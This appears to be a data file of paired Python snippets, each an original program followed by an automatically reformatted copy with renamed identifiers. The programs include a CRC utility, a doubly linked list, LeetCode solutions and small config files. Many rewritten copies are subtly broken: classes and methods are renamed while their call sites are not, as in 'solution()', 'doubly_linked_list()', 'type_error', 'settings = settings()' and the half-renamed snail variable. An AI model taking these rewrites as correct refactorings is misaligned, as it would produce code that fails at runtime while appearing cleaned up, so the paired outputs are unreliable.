Given a non-empty array of integers,
every element appears twice except for one.
Find that single one.
Note:
Your algorithm should have a linear runtime complexity.
Could you implement it without using extra memory?
"""
def single_number(integers):
unique = 0
for integer in integers:
unique ^= integer
return unique
if __name__ == '__main__':
assert single_number([-1, 1, 2, 1, 2]) == -1
assert single_number([0, 1, 2, 1, 2]) == 0
assert single_number([1, 2, 1, 2]) == 0 |
#define the main
def main():
i = 0 #declare an integer i
x = 119.0 #declare a float x
for i in range(120): #loop i from 0 to 119
if ((i%2)==0): #if i is even
x += 3. #add 3
else: #if i is odd
x -= 5. #subtract 5 from x
s = "%3.2e" % x #make a string containing x
print(s)
if __name__ == "__main__":
main() | def main():
i = 0
x = 119.0
for i in range(120):
if i % 2 == 0:
x += 3.0
else:
x -= 5.0
s = '%3.2e' % x
print(s)
if __name__ == '__main__':
main() |
#class memorySetting():
global packet_db
packet_db = {}
# Schema
# Key for access is MAC Address/IP Address
# * Initially had mac address (assuming unique) as the only key
# - CTF problems sometime cause a scenario of same mac with different IP address so segregated this
# * Otherwise each key holds
# - Mac Vendor
# - Ip address
global lan_hosts
lan_hosts = {}
global destination_hosts
destination_hosts = {}
global tor_nodes
tor_nodes = []
global possible_tor_traffic
possible_tor_traffic = []
global malicious_traffic
possible_mal_traffic = []
global signatures
signatures = {}
| global packet_db
packet_db = {}
global lan_hosts
lan_hosts = {}
global destination_hosts
destination_hosts = {}
global tor_nodes
tor_nodes = []
global possible_tor_traffic
possible_tor_traffic = []
global malicious_traffic
possible_mal_traffic = []
global signatures
signatures = {} |
# -*- coding: Latin-1 -*-
# pycrc -- parametrisable CRC calculation utility and C source code generator
#
# Copyright (c) 2006-2011 Thomas Pircher <tehpeh@gmx.net>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
CRC routines for pycrc.
If you want to study the Python implementation of the CRC routines, then you are
looking at the right place.
Examples
========
This is an example use of the different algorithms:
>>> from crc_algorithms import Crc
>>>
>>> crc = Crc(width = 16, poly = 0x8005,
... reflect_in = True, xor_in = 0x0000,
... reflect_out = True, xor_out = 0x0000)
>>> print("0x%x" % crc.bit_by_bit("123456789"))
>>> print("0x%x" % crc.bit_by_bit_fast("123456789"))
>>> print("0x%x" % crc.table_driven("123456789"))
This file is part of pycrc.
"""
# Class Crc
###############################################################################
class Crc(object):
"""
A base class for CRC routines.
"""
# Class constructor
###############################################################################
def __init__(self, width, poly, reflect_in, xor_in, reflect_out, xor_out, table_idx_width = None):
"""The Crc constructor.
The parameters are as follows:
width
poly
reflect_in
xor_in
reflect_out
xor_out
"""
self.Width = width
self.Poly = poly
self.ReflectIn = reflect_in
self.XorIn = xor_in
self.ReflectOut = reflect_out
self.XorOut = xor_out
self.TableIdxWidth = table_idx_width
self.MSB_Mask = 0x1 << (self.Width - 1)
self.Mask = ((self.MSB_Mask - 1) << 1) | 1
if self.TableIdxWidth != None:
self.TableWidth = 1 << self.TableIdxWidth
else:
self.TableIdxWidth = 8
self.TableWidth = 1 << self.TableIdxWidth
self.DirectInit = self.XorIn
self.NonDirectInit = self.__get_nondirect_init(self.XorIn)
if self.Width < 8:
self.CrcShift = 8 - self.Width
else:
self.CrcShift = 0
# function __get_nondirect_init
###############################################################################
def __get_nondirect_init(self, init):
"""
return the non-direct init if the direct algorithm has been selected.
"""
crc = init
for i in range(self.Width):
bit = crc & 0x01
if bit:
crc^= self.Poly
crc >>= 1
if bit:
crc |= self.MSB_Mask
return crc & self.Mask
# function reflect
###############################################################################
def reflect(self, data, width):
"""
reflect a data word, i.e. reverts the bit order.
"""
x = data & 0x01
for i in range(width - 1):
data >>= 1
x = (x << 1) | (data & 0x01)
return x
# function bit_by_bit
###############################################################################
def bit_by_bit(self, in_str):
"""
Classic simple and slow CRC implementation.
This function iterates bit by bit over the augmented input message and returns the calculated CRC value at the end
"""
register = self.NonDirectInit
for c in in_str:
octet = ord(c)
if self.ReflectIn:
octet = self.reflect(octet, 8)
for i in range(8):
topbit = register & self.MSB_Mask
register = ((register << 1) & self.Mask) | ((octet >> (7 - i)) & 0x01)
if topbit:
register ^= self.Poly
for i in range(self.Width):
topbit = register & self.MSB_Mask
register = ((register << 1) & self.Mask)
if topbit:
register ^= self.Poly
if self.ReflectOut:
register = self.reflect(register, self.Width)
return register ^ self.XorOut
# function bit_by_bit_fast
###############################################################################
def bit_by_bit_fast(self, in_str):
"""
This is a slightly modified version of the bit-by-bit algorithm: it does not need to loop over the augmented bits,
i.e. the Width 0-bits wich are appended to the input message in the bit-by-bit algorithm.
"""
register = self.DirectInit
for c in in_str:
octet = ord(c)
if self.ReflectIn:
octet = self.reflect(octet, 8)
for i in range(8):
topbit = register & self.MSB_Mask
if octet & (0x80 >> i):
topbit ^= self.MSB_Mask
register <<= 1
if topbit:
register ^= self.Poly
register &= self.Mask
if self.ReflectOut:
register = self.reflect(register, self.Width)
return register ^ self.XorOut
# function gen_table
###############################################################################
def gen_table(self):
"""
This function generates the CRC table used for the table_driven CRC algorithm.
The Python version cannot handle tables of an index width other than 8.
See the generated C code for tables with different sizes instead.
"""
table_length = 1 << self.TableIdxWidth
tbl = [0] * table_length
for i in range(table_length):
register = i
if self.ReflectIn:
register = self.reflect(register, self.TableIdxWidth)
register = register << (self.Width - self.TableIdxWidth + self.CrcShift)
for j in range(self.TableIdxWidth):
if register & (self.MSB_Mask << self.CrcShift) != 0:
register = (register << 1) ^ (self.Poly << self.CrcShift)
else:
register = (register << 1)
if self.ReflectIn:
register = self.reflect(register >> self.CrcShift, self.Width) << self.CrcShift
tbl[i] = register & (self.Mask << self.CrcShift)
return tbl
# function table_driven
###############################################################################
def table_driven(self, in_str):
"""
The Standard table_driven CRC algorithm.
"""
tbl = self.gen_table()
register = self.DirectInit << self.CrcShift
if not self.ReflectIn:
for c in in_str:
tblidx = ((register >> (self.Width - self.TableIdxWidth + self.CrcShift)) ^ ord(c)) & 0xff
register = ((register << (self.TableIdxWidth - self.CrcShift)) ^ tbl[tblidx]) & (self.Mask << self.CrcShift)
register = register >> self.CrcShift
else:
register = self.reflect(register, self.Width + self.CrcShift) << self.CrcShift
for c in in_str:
tblidx = ((register >> self.CrcShift) ^ ord(c)) & 0xff
register = ((register >> self.TableIdxWidth) ^ tbl[tblidx]) & (self.Mask << self.CrcShift)
register = self.reflect(register, self.Width + self.CrcShift) & self.Mask
if self.ReflectOut:
register = self.reflect(register, self.Width)
return register ^ self.XorOut
| """
CRC routines for pycrc.
If you want to study the Python implementation of the CRC routines, then you are
looking at the right place.
Examples
========
This is an example use of the different algorithms:
>>> from crc_algorithms import Crc
>>>
>>> crc = Crc(width = 16, poly = 0x8005,
... reflect_in = True, xor_in = 0x0000,
... reflect_out = True, xor_out = 0x0000)
>>> print("0x%x" % crc.bit_by_bit("123456789"))
>>> print("0x%x" % crc.bit_by_bit_fast("123456789"))
>>> print("0x%x" % crc.table_driven("123456789"))
This file is part of pycrc.
"""
class Crc(object):
"""
A base class for CRC routines.
"""
def __init__(self, width, poly, reflect_in, xor_in, reflect_out, xor_out, table_idx_width=None):
"""The Crc constructor.
The parameters are as follows:
width
poly
reflect_in
xor_in
reflect_out
xor_out
"""
self.Width = width
self.Poly = poly
self.ReflectIn = reflect_in
self.XorIn = xor_in
self.ReflectOut = reflect_out
self.XorOut = xor_out
self.TableIdxWidth = table_idx_width
self.MSB_Mask = 1 << self.Width - 1
self.Mask = self.MSB_Mask - 1 << 1 | 1
if self.TableIdxWidth != None:
self.TableWidth = 1 << self.TableIdxWidth
else:
self.TableIdxWidth = 8
self.TableWidth = 1 << self.TableIdxWidth
self.DirectInit = self.XorIn
self.NonDirectInit = self.__get_nondirect_init(self.XorIn)
if self.Width < 8:
self.CrcShift = 8 - self.Width
else:
self.CrcShift = 0
def __get_nondirect_init(self, init):
"""
return the non-direct init if the direct algorithm has been selected.
"""
crc = init
for i in range(self.Width):
bit = crc & 1
if bit:
crc ^= self.Poly
crc >>= 1
if bit:
crc |= self.MSB_Mask
return crc & self.Mask
def reflect(self, data, width):
"""
reflect a data word, i.e. reverts the bit order.
"""
x = data & 1
for i in range(width - 1):
data >>= 1
x = x << 1 | data & 1
return x
def bit_by_bit(self, in_str):
"""
Classic simple and slow CRC implementation.
This function iterates bit by bit over the augmented input message and returns the calculated CRC value at the end
"""
register = self.NonDirectInit
for c in in_str:
octet = ord(c)
if self.ReflectIn:
octet = self.reflect(octet, 8)
for i in range(8):
topbit = register & self.MSB_Mask
register = register << 1 & self.Mask | octet >> 7 - i & 1
if topbit:
register ^= self.Poly
for i in range(self.Width):
topbit = register & self.MSB_Mask
register = register << 1 & self.Mask
if topbit:
register ^= self.Poly
if self.ReflectOut:
register = self.reflect(register, self.Width)
return register ^ self.XorOut
def bit_by_bit_fast(self, in_str):
"""
This is a slightly modified version of the bit-by-bit algorithm: it does not need to loop over the augmented bits,
i.e. the Width 0-bits wich are appended to the input message in the bit-by-bit algorithm.
"""
register = self.DirectInit
for c in in_str:
octet = ord(c)
if self.ReflectIn:
octet = self.reflect(octet, 8)
for i in range(8):
topbit = register & self.MSB_Mask
if octet & 128 >> i:
topbit ^= self.MSB_Mask
register <<= 1
if topbit:
register ^= self.Poly
register &= self.Mask
if self.ReflectOut:
register = self.reflect(register, self.Width)
return register ^ self.XorOut
def gen_table(self):
"""
This function generates the CRC table used for the table_driven CRC algorithm.
The Python version cannot handle tables of an index width other than 8.
See the generated C code for tables with different sizes instead.
"""
table_length = 1 << self.TableIdxWidth
tbl = [0] * table_length
for i in range(table_length):
register = i
if self.ReflectIn:
register = self.reflect(register, self.TableIdxWidth)
register = register << self.Width - self.TableIdxWidth + self.CrcShift
for j in range(self.TableIdxWidth):
if register & self.MSB_Mask << self.CrcShift != 0:
register = register << 1 ^ self.Poly << self.CrcShift
else:
register = register << 1
if self.ReflectIn:
register = self.reflect(register >> self.CrcShift, self.Width) << self.CrcShift
tbl[i] = register & self.Mask << self.CrcShift
return tbl
def table_driven(self, in_str):
"""
The Standard table_driven CRC algorithm.
"""
tbl = self.gen_table()
register = self.DirectInit << self.CrcShift
if not self.ReflectIn:
for c in in_str:
tblidx = (register >> self.Width - self.TableIdxWidth + self.CrcShift ^ ord(c)) & 255
register = (register << self.TableIdxWidth - self.CrcShift ^ tbl[tblidx]) & self.Mask << self.CrcShift
register = register >> self.CrcShift
else:
register = self.reflect(register, self.Width + self.CrcShift) << self.CrcShift
for c in in_str:
tblidx = (register >> self.CrcShift ^ ord(c)) & 255
register = (register >> self.TableIdxWidth ^ tbl[tblidx]) & self.Mask << self.CrcShift
register = self.reflect(register, self.Width + self.CrcShift) & self.Mask
if self.ReflectOut:
register = self.reflect(register, self.Width)
return register ^ self.XorOut |
sm = [[1, 2, 3],
[8, 9, 4],
[7, 6, 5]]
sm2 = [[1, 2, 3, 4],
[12, 13, 14, 5],
[11, 16, 15, 6],
[10, 9, 8, 7]]
def snail(snail_map):
ans = []
c = 0
nMtx = snail_map
l = len(snail_map)
for i in snail_map[0]:
ans.append(i)
for i in range(l):
if i > 0 and i < l - 1:
ans.append(snail_map[i][len(snail_map[i]) - 1])
snail_map[-1].reverse()
for i in snail_map[-1]:
ans.append(i)
snail_map.reverse()
for i in range(l):
if i > 0 and i < l - 1:
ans.append(snail_map[i][0])
for i in nMtx:
for j in i:
if j in ans:
i.remove(j)
nMtx.remove(nMtx[0])
nMtx.remove(nMtx[l - 2])
nMtx.reverse()
for i in nMtx:
for j in i:
c = c + 1
if c > 0:
if c == 1:
ans.append(nMtx[0][0])
else:
for i in nMtx[0]:
ans.append(i)
for i in range(len(nMtx)):
if i > 0 and i < len(nMtx) - 1:
ans.append(nMtx[i][len(nMtx[i]) - 1])
nMtx[-1].reverse()
for i in nMtx[-1]:
ans.append(i)
nMtx.reverse()
for i in range(len(nMtx)):
if i > 0 and i < len(nMtx) - 1:
ans.append(nMtx[i][0])
for i in nMtx:
for j in i:
if j in ans:
i.remove(j)
if len(nMtx) > 1:
nMtx.remove(nMtx[0])
nMtx.reverse()
c = 0
return ans
print(snail(sm))
print(snail(sm2)) | sm = [[1, 2, 3], [8, 9, 4], [7, 6, 5]]
sm2 = [[1, 2, 3, 4], [12, 13, 14, 5], [11, 16, 15, 6], [10, 9, 8, 7]]
def snail(snail_map):
ans = []
c = 0
n_mtx = snail_map
l = len(snail_map)
for i in snail_map[0]:
ans.append(i)
for i in range(l):
if i > 0 and i < l - 1:
ans.append(snail_map[i][len(snail_map[i]) - 1])
snail_map[-1].reverse()
for i in snail_map[-1]:
ans.append(i)
snail_map.reverse()
for i in range(l):
if i > 0 and i < l - 1:
ans.append(snail_map[i][0])
for i in nMtx:
for j in i:
if j in ans:
i.remove(j)
nMtx.remove(nMtx[0])
nMtx.remove(nMtx[l - 2])
nMtx.reverse()
for i in nMtx:
for j in i:
c = c + 1
if c > 0:
if c == 1:
ans.append(nMtx[0][0])
else:
for i in nMtx[0]:
ans.append(i)
for i in range(len(nMtx)):
if i > 0 and i < len(nMtx) - 1:
ans.append(nMtx[i][len(nMtx[i]) - 1])
nMtx[-1].reverse()
for i in nMtx[-1]:
ans.append(i)
nMtx.reverse()
for i in range(len(nMtx)):
if i > 0 and i < len(nMtx) - 1:
ans.append(nMtx[i][0])
for i in nMtx:
for j in i:
if j in ans:
i.remove(j)
if len(nMtx) > 1:
nMtx.remove(nMtx[0])
nMtx.reverse()
c = 0
return ans
print(snail(sm))
print(snail(sm2)) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (c) 2019, Gianluca Fiore
#
###############################################################################
__author__ = "Gianluca Fiore"
class Node(object):
def __init__(self, data=None, next_node=None, prev_node=None):
self.data = data
self.next_node = next_node
self.prev_node = prev_node
# Return the current Node's value
def getData(self):
return self.data
# Set a new value for Node
def setData(self, val):
self.data = val
class DoublyLinkedList(object):
def __init__(self, head=None, tail=None):
self.head = head
self.tail = tail
self.size = 0
# Get the current size of the list
def getSize(self):
return self.size
# Insert a new Node in the list
def insert(self, node):
if self.head is None:
self.head = node
self.tail = node
self.size += 1
else:
node.prev_node = self.tail
self.tail.next_node = node
self.tail = node
self.size += 1
# Remove a node from the list
def remove(self, node):
if self.head is None:
# List empty, return false
return False
if node.data == self.head.data:
if self.head == self.tail:
self.head = None
self.tail = None
self.size -= 1
else:
self.head = self.head.next_node
self.head.prev_node = None
self.size -= 1
return True
curr = self.head.next_node
while curr is not None and node.data is not curr.data:
curr = curr.next_node
if curr == self.tail:
self.tail = self.tail.prev_node
self.tail.next_node = None
self.size -= 1
return True
elif curr is not None:
curr.prev_node.next_node = curr.next_node
curr.next_node.prev_node = curr.prev_node
self.size -= 1
return True
else:
return False
# Print all values of nodes in the list
def printList(self):
if self.head is None:
print("Empty List")
return
print("List of %i nodes" % self.size)
curr = self.head
while curr:
print(curr.getData())
curr = curr.next_node
# Reverse traversal of the list
def reverseTraversal(self):
curr = self.tail
while curr is not None:
yield curr.data
curr = curr.prev_node
def main():
ll = DoublyLinkedList()
n1 = Node(12)
n2 = Node(33)
n3 = Node("ggg")
ll.insert(n1)
ll.insert(n2)
ll.insert(n3)
ll.printList()
if __name__ == '__main__':
main()
| __author__ = 'Gianluca Fiore'
class Node(object):
def __init__(self, data=None, next_node=None, prev_node=None):
self.data = data
self.next_node = next_node
self.prev_node = prev_node
def get_data(self):
return self.data
def set_data(self, val):
self.data = val
class Doublylinkedlist(object):
def __init__(self, head=None, tail=None):
self.head = head
self.tail = tail
self.size = 0
def get_size(self):
return self.size
def insert(self, node):
if self.head is None:
self.head = node
self.tail = node
self.size += 1
else:
node.prev_node = self.tail
self.tail.next_node = node
self.tail = node
self.size += 1
def remove(self, node):
if self.head is None:
return False
if node.data == self.head.data:
if self.head == self.tail:
self.head = None
self.tail = None
self.size -= 1
else:
self.head = self.head.next_node
self.head.prev_node = None
self.size -= 1
return True
curr = self.head.next_node
while curr is not None and node.data is not curr.data:
curr = curr.next_node
if curr == self.tail:
self.tail = self.tail.prev_node
self.tail.next_node = None
self.size -= 1
return True
elif curr is not None:
curr.prev_node.next_node = curr.next_node
curr.next_node.prev_node = curr.prev_node
self.size -= 1
return True
else:
return False
def print_list(self):
if self.head is None:
print('Empty List')
return
print('List of %i nodes' % self.size)
curr = self.head
while curr:
print(curr.getData())
curr = curr.next_node
def reverse_traversal(self):
curr = self.tail
while curr is not None:
yield curr.data
curr = curr.prev_node
def main():
ll = doubly_linked_list()
n1 = node(12)
n2 = node(33)
n3 = node('ggg')
ll.insert(n1)
ll.insert(n2)
ll.insert(n3)
ll.printList()
if __name__ == '__main__':
main() |
class A(object):
val = 1
class B(A):
pass
class C(A):
pass
print(A.val, B.val, C.val)
B.val = 2
print (A.val, B.val, C.val)
A.val = 3
print (A.val, B.val, C.val)
"""
Explanation:
In Python,{{{{ class variables are internally handled as dictionaries}}}}.
If a variable name is not found in the dictionary of the current class,
the class hierarchy (i.e., its parent classes) are searched until the referenced
variable name is found, if the variable is not found error is being thrown.
So, in the above program the first call to print() prints the initialized value i.e, 1.
In the second call since B. val is set to 2, the output is 1 2 1.
The last output 3 2 3 may be surprising. Instead of 3 3 3, here B.val
reflects 2 instead of 3 [[[[[since it is overridden earlier]]]]].
"""
| class A(object):
val = 1
class B(A):
pass
class C(A):
pass
print(A.val, B.val, C.val)
B.val = 2
print(A.val, B.val, C.val)
A.val = 3
print(A.val, B.val, C.val)
'\nExplanation:\nIn Python,{{{{ class variables are internally handled as dictionaries}}}}. \nIf a variable name is not found in the dictionary of the current class, \nthe class hierarchy (i.e., its parent classes) are searched until the referenced \nvariable name is found, if the variable is not found error is being thrown.\nSo, in the above program the first call to print() prints the initialized value i.e, 1.\nIn the second call since B. val is set to 2, the output is 1 2 1.\nThe last output 3 2 3 may be surprising. Instead of 3 3 3, here B.val\nreflects 2 instead of 3 [[[[[since it is overridden earlier]]]]].\n' |
##This program finds all the numbers between 1500 and 2700 that are
##divisible by 5 and 7.
n = range(1500, 2700)
newlist = []
for i in n:
if (i%7==0) and (i%5==0):
newlist.append(str(i))
print(newlist)
| n = range(1500, 2700)
newlist = []
for i in n:
if i % 7 == 0 and i % 5 == 0:
newlist.append(str(i))
print(newlist) |
class Solution(object):
def firstUniqChar(self, s):
"""
:type s: str
:rtype: int
"""
d={}
for i,x in enumerate(s):
if x in d:
continue
elif s[i:].count(x)==1:
return i
else:
d[x]=1
return -1 | class Solution(object):
def first_uniq_char(self, s):
"""
:type s: str
:rtype: int
"""
d = {}
for (i, x) in enumerate(s):
if x in d:
continue
elif s[i:].count(x) == 1:
return i
else:
d[x] = 1
return -1 |
def test_augassign():
r: i32
s: i32
r = 0
r += 4
s = 5
r *= s
r -= 2
s = 10
r /= s
a: str
a = ""
a += "test"
| def test_augassign():
r: i32
s: i32
r = 0
r += 4
s = 5
r *= s
r -= 2
s = 10
r /= s
a: str
a = ''
a += 'test' |
'''
Descripttion:
version:
Author: HuSharp
Date: 2021-02-09 11:34:48
LastEditors: HuSharp
LastEditTime: 2021-02-09 11:42:18
@Email: 8211180515@csu.edu.cn
'''
def count(s, val):
'''cnt the val 's nums in s
>>> count([1,2,3,4,1], 1)
2
'''
total = 0
for element in s:
if element == val:
total += 1
return total
def count_same(s):
'''
>>> for x, y in [(1, 1), (2, 4), (3, 9)]:
print(x, y)
1 1
2 4
3 9
'''
same_count = 0
for x, y in s:
if x == y:
same_count += 1
return same_count | """
Descripttion:
version:
Author: HuSharp
Date: 2021-02-09 11:34:48
LastEditors: HuSharp
LastEditTime: 2021-02-09 11:42:18
@Email: 8211180515@csu.edu.cn
"""
def count(s, val):
"""cnt the val 's nums in s
>>> count([1,2,3,4,1], 1)
2
"""
total = 0
for element in s:
if element == val:
total += 1
return total
def count_same(s):
"""
>>> for x, y in [(1, 1), (2, 4), (3, 9)]:
print(x, y)
1 1
2 4
3 9
"""
same_count = 0
for (x, y) in s:
if x == y:
same_count += 1
return same_count |
__title__ = 'krnl'
__url__ = 'https://github.com/cens6r/krnl.py/'
__author__ = 'Cens6r'
__email__ = 'cens6r@no-email-yet'
__license__ = 'MIT License'
__version__ = '1.0.0'
__description__ = 'Utilize the KRNL Api easily from python'
| __title__ = 'krnl'
__url__ = 'https://github.com/cens6r/krnl.py/'
__author__ = 'Cens6r'
__email__ = 'cens6r@no-email-yet'
__license__ = 'MIT License'
__version__ = '1.0.0'
__description__ = 'Utilize the KRNL Api easily from python' |
class Solution(object):
def minTimeToVisitAllPoints(self, points):
"""
:type points: List[List[int]]
:rtype: int
"""
t = 0
for i in range(len(points) - 1):
t += self._time(points[i], points[i + 1])
return t
def _time(self, pa, pb):
t1 = abs(pb[0] - pa[0])
t2 = abs(pb[1] - pa[1])
return min(t1, t2) + abs(t2 - t1)
def test_min_time_to_visit_all_points():
s = Solution()
assert 7 == s.minTimeToVisitAllPoints([[1, 1], [3, 4], [-1, 0]])
assert 5 == s.minTimeToVisitAllPoints([[3, 2], [-2, 2]])
| class Solution(object):
def min_time_to_visit_all_points(self, points):
"""
:type points: List[List[int]]
:rtype: int
"""
t = 0
for i in range(len(points) - 1):
t += self._time(points[i], points[i + 1])
return t
def _time(self, pa, pb):
t1 = abs(pb[0] - pa[0])
t2 = abs(pb[1] - pa[1])
return min(t1, t2) + abs(t2 - t1)
def test_min_time_to_visit_all_points():
s = solution()
assert 7 == s.minTimeToVisitAllPoints([[1, 1], [3, 4], [-1, 0]])
assert 5 == s.minTimeToVisitAllPoints([[3, 2], [-2, 2]]) |
class DiffLineState:
INSERT = 0
DELETE = 1
UNCHANGED = 2
class DiffLine():
def __init__(self):
self.text = None
self.state = DiffLineState.UNCHANGED
class DiffChange():
def __init__(self):
self.oldStartLine = None
self.newStartLine = None
self.description = None
self.lines = []
class DiffFile():
def __init__(self):
self.oldPath = None
self.newPath = None
self.pathChanged = False
self.changes = []
self.diffLine = None
class Settings():
headingStyle = None
labelPrefix = None
shouldAddLabel = None
outfile = None
diffPrefixRegex = None
quiet = None
settings = Settings()
class ParseError(Exception):
def __init__(self, lineNum, e):
self.lineNum = lineNum
self.e = e
def __str__(self):
return ("An error occurred while parsing your diff file at line %d" % self.lineNum)
class ToTexError(Exception):
def __init__(self, e):
self.e = e
def __str__(self):
return ("An error occurred while converting your diff to TeX")
| class Difflinestate:
insert = 0
delete = 1
unchanged = 2
class Diffline:
def __init__(self):
self.text = None
self.state = DiffLineState.UNCHANGED
class Diffchange:
def __init__(self):
self.oldStartLine = None
self.newStartLine = None
self.description = None
self.lines = []
class Difffile:
def __init__(self):
self.oldPath = None
self.newPath = None
self.pathChanged = False
self.changes = []
self.diffLine = None
class Settings:
heading_style = None
label_prefix = None
should_add_label = None
outfile = None
diff_prefix_regex = None
quiet = None
settings = settings()
class Parseerror(Exception):
def __init__(self, lineNum, e):
self.lineNum = lineNum
self.e = e
def __str__(self):
return 'An error occurred while parsing your diff file at line %d' % self.lineNum
class Totexerror(Exception):
def __init__(self, e):
self.e = e
def __str__(self):
return 'An error occurred while converting your diff to TeX' |
def binary_search(sorted_list, key):
if type(key) is not int:
raise TypeError('Argument invalid. Must be int.')
left = 0
right = len(sorted_list) - 1
while left != right:
# import pdb; pdb.set_trace()
if (left + right) % 2:
if sorted_list[int((left + right) / 2)] == key:
return int((left + right) / 2)
if sorted_list[int((left + right) / 2)] > key:
right = int((left + right) / 2)
else:
left = int((left + right) / 2)
elif sorted_list[int((left + right + 1) / 2)] == key:
return int((left + right + 1) / 2)
if sorted_list[int((left + right + 1) / 2)] == key:
return int((left + right + 1) / 2)
if sorted_list[int((left + right + 1) / 2)] > key:
right = int((left + right + 1) / 2)
else:
left = int((left + right + 1) / 2)
return 0 - 1
if __name__ == '__main__':
binary_search([4, 8, 15, 16, 23, 42], 42) | def binary_search(sorted_list, key):
if type(key) is not int:
raise type_error('Argument invalid. Must be int.')
left = 0
right = len(sorted_list) - 1
while left != right:
if (left + right) % 2:
if sorted_list[int((left + right) / 2)] == key:
return int((left + right) / 2)
if sorted_list[int((left + right) / 2)] > key:
right = int((left + right) / 2)
else:
left = int((left + right) / 2)
elif sorted_list[int((left + right + 1) / 2)] == key:
return int((left + right + 1) / 2)
if sorted_list[int((left + right + 1) / 2)] == key:
return int((left + right + 1) / 2)
if sorted_list[int((left + right + 1) / 2)] > key:
right = int((left + right + 1) / 2)
else:
left = int((left + right + 1) / 2)
return 0 - 1
if __name__ == '__main__':
binary_search([4, 8, 15, 16, 23, 42], 42) |
# -*- coding: utf-8 -*-
log_file = "autogreeter.log" # Fill this out for a logging. P.S It's a must!
slack_token = "" # token for slack bot
welcomemessagedm = "" # what the bot should dm the person
welcomemessagechannel = "" # what should the bot post on a channel, leave empty to not post
| log_file = 'autogreeter.log'
slack_token = ''
welcomemessagedm = ''
welcomemessagechannel = '' |
table = [
'Feature | This Lib | Classical Singleton | [herpe] | [ugrif] | [xytis] | [aworx] | [fwolt] | [zyf38] | [cheno] | [cppma]',
'supports instance replacement for testing | X | - | - | - | - | - | - | - | X | X',
'2-phase initialization avoidable| X | - | - | - | - | - | - | - | - | -',
'control over construction seqence | full | limited | limited<sup>2</sup> | limited<sup>2</sup> | limited<sup>2</sup> | limited<sup>2</sup> | limited | limited<sup>2</sup> | limited<sup>2</sup> | full<sup>2</sup>',
'control over destruction seqence | full | none | none | full | full | full | none | none | full | full',
'control over destruction point in time | full | none | none | full | full | full | none | none | full | full',
'automatic destruction | X | X | X | - | -<sup>3</sup> | - | X | X | -<sup>4</sup> | X',
'constructor arguments | X | - | X<sup>1</sup> | - | - | - | X | - | - | up to 4',
'threadsave construction | - | X | X | - | - | X<sup>5</sup> | X | X | X | optional',
'implementation pattern | indep. class | function | CRTP | macro | indep. class | CRTP | CRTP | indep. class | indep. class | indep. class',
'forces virtual destructor | - | - | X | - | - | X | - | - | - | -',
'thread local instances | - | - | - | - | - | - | - | - | X | -']
for x in range(11):
line = ''
for oldLine in table:
line = line + ' | ' + oldLine.split('|')[x]
line = line + ' |'
print(line)
| table = ['Feature | This Lib | Classical Singleton | [herpe] | [ugrif] | [xytis] | [aworx] | [fwolt] | [zyf38] | [cheno] | [cppma]', 'supports instance replacement for testing | X | - | - | - | - | - | - | - | X | X', '2-phase initialization avoidable| X | - | - | - | - | - | - | - | - | -', 'control over construction seqence | full | limited | limited<sup>2</sup> | limited<sup>2</sup> | limited<sup>2</sup> | limited<sup>2</sup> | limited | limited<sup>2</sup> | limited<sup>2</sup> | full<sup>2</sup>', 'control over destruction seqence | full | none | none | full | full | full | none | none | full | full', 'control over destruction point in time | full | none | none | full | full | full | none | none | full | full', 'automatic destruction | X | X | X | - | -<sup>3</sup> | - | X | X | -<sup>4</sup> | X', 'constructor arguments | X | - | X<sup>1</sup> | - | - | - | X | - | - | up to 4', 'threadsave construction | - | X | X | - | - | X<sup>5</sup> | X | X | X | optional', 'implementation pattern | indep. class | function | CRTP | macro | indep. class | CRTP | CRTP | indep. class | indep. class | indep. class', 'forces virtual destructor | - | - | X | - | - | X | - | - | - | -', 'thread local instances | - | - | - | - | - | - | - | - | X | -']
for x in range(11):
line = ''
for old_line in table:
line = line + ' | ' + oldLine.split('|')[x]
line = line + ' |'
print(line) |
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 16 15:37:04 2020
@author: CHANGE WITH YOUR NAME
This is a blablabla..
"""
print(3+4)
print(3, 4, 3+4)
print("3 4 3+4")
print()
print("The answer is 3+4")
| """
Created on Wed Sep 16 15:37:04 2020
@author: CHANGE WITH YOUR NAME
This is a blablabla..
"""
print(3 + 4)
print(3, 4, 3 + 4)
print('3 4 3+4')
print()
print('The answer is 3+4') |
def cross(u, v):
"""
return the cross product of 2 vectors.
"""
dim = len(u)
s = []
for i in range(0, dim):
if i == 0:
j,k = 1,2
s.append(u[j]*v[k] - u[k]*v[j])
elif i == 1:
j,k = 2,0
s.append(u[j]*v[k] - u[k]*v[j])
else:
j,k = 0,1
s.append(u[j]*v[k] - u[k]*v[j])
return s | def cross(u, v):
"""
return the cross product of 2 vectors.
"""
dim = len(u)
s = []
for i in range(0, dim):
if i == 0:
(j, k) = (1, 2)
s.append(u[j] * v[k] - u[k] * v[j])
elif i == 1:
(j, k) = (2, 0)
s.append(u[j] * v[k] - u[k] * v[j])
else:
(j, k) = (0, 1)
s.append(u[j] * v[k] - u[k] * v[j])
return s |
"""
instance.py contains the basic classes of the items in a study plan card,
like university, faculty, major, and course. This was made to 'objectify' the
data fetched from the courses.json file
"""
class University:
"""Wrapper for University item"""
def __init__(self, name=None, faculties=[], aliases=[]):
self.name = name
self.aliases = aliases
self.faculties = faculties
def add_faculty(self, faculty):
"""
Associate a single faculty to current university, works both ways.
It first checks if current university already have the given faculty
associated. Otherwise, it adds to the `faculties` attributes. Then,
it changes the `university` parent attribute on the faculty object
to current university.
Parameters
----------
faculty : `Faculty`
The faculty object that is going to be associated with
Returns
